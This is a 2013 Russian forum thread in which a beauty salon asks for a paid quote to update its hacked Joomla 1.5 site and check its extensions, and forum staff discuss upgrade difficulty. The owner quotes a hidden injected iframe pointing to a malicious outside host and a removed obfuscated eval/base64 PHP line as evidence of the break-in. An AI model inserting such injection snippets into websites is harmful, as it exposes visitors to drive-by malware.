1. Вниманию авторов!

    Темы из разделов платных услуг удаляются, если:
    • тема создана более 2-х месяцев назад И
    • внутри темы не ведётся активных обсуждений задачи И
    • автор не уведомил администрацию об актуальности задачи.
    Так же тема будет удалена, если:
    • есть подозрение на мошеннические действия со стороны автора;
    • в задаче предлагается оказать содействие в разработке ресурсов, направленность которых противоречит законодательству РФ и моральным устоям здорового общества.
    Скрыть объявление

Необходимо установить обновление Joomla и проверить расширения на дыры (после взлома сайта)

Тема в разделе "АРХИВ", создана пользователем salon-elena, 29.03.2013.

  1. Offline

    salon-elena Недавно здесь

    Регистрация:
    29.03.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Женский
    Просим сообщить сколько будет стоить такая работа.

    Сайт http://www.salon-elena.com/


    Приложены PDF-файлы с описанием компонентов и прочего, что должно помочь определить цену работы.


    Вредоносный код был на всех страницах сайта, сейчас его убрали со всех статичных, но он все еще остался прямо на странице администрирования сайта (http://salon-elena.com/administrator/):

    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adventurous.com/agxs.html?i=2034475></iframe>

    ведет на сайт http://carbookingonline.com/agxs.htm?j=2034475, который числится среди вредоносных сайтов у гугла.


    1. Нужно обновить версию joomla (текущая 1.5.18 + Uplab 2.1.2)

    2. Убедится, что нет этого кода ни на каких страницах, включая страницы для администрирования

    3. Проверить расширения на отсутствие дыр или исправить их - либо заменить на что-то надежное

    4. А сам сайт визуально и по функционалу оставить таким как есть сейчас.

    Ждем комментарии и цену работ


    Спасибо за ответы,
    Коллектив салона Елена
     

    Вложения:

  2.  
  3. Offline

    salon-elena Недавно здесь

    Регистрация:
    29.03.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Женский
    Дополнение про зловредный код

    Еще там была (сейчас уже удалена) вот такая закодированная штука:

    <?php eval(gzinflate(base64_decode("......."))); ?>


    И еще в файле default.php есть непонятный пустой файл jcreate.php
     
    Последнее редактирование модератором: 30.03.2013
  4. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 050
    Симпатии:
    520
    Пол:
    Мужской
  5. Offline

    salon-elena Недавно здесь

    Регистрация:
    29.03.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Женский
    Не знаю, отправилось ли вам ответное сообщение в почте, не вижу его в отправленных, поэтому повторяю тут:


    Добрый день!

    Не совсем понял, почему вы предлагаете обновить до 1.5.2 - это же наверное тоже старая версия, раз есть уже версия 2 и даже 3... Мы так поняли, что в старых версиях уже хорошо известны дыры и потому их надо заменить на новую...

    Поясните пожалуйста

    Спасибо!
     
  6. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 464
    Симпатии:
    305
    Пол:
    Мужской
    хех)) это не просто цифры 1 2 3 - это ветки CMS Joomla! 1.5 / 2.5 / 3.0 (тестовая)

    Если сайт на 1.5, перевести на 2.5 будет практически эпическим трудом + у Вас дофига сторонних расширений стоит, а Вы уверены, что разработчики ВСЕХ расширений которые у Вас на 1.5 сделали их для 2.5? собственно цена перевода с 1.5 на 2.5 порой бывает сопоставима с созданием нового сайта или переезд собственно НЕВОЗМОЖЕН из-за того, что нету расширений на 2.5, которые есть у Вас на 1.5

    Скажем так... Есть Лада Приора (1.5) Hummer x2 (2.5) и Вездеход (3.0)

    Чтобы из Лады сделать Хаммер сами подумайте, что надо изменить))) собственно пример может и не совсем точный, но не все так просто.
     
  7. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 050
    Симпатии:
    520
    Пол:
    Мужской
    J 1.5.26 не взламывают,а вернее взлом через сторонние расширения.
    Аналогично и на J 2.5.
    Не подходит мое предложение- снимаю.
     

Поделиться этой страницей

Загрузка...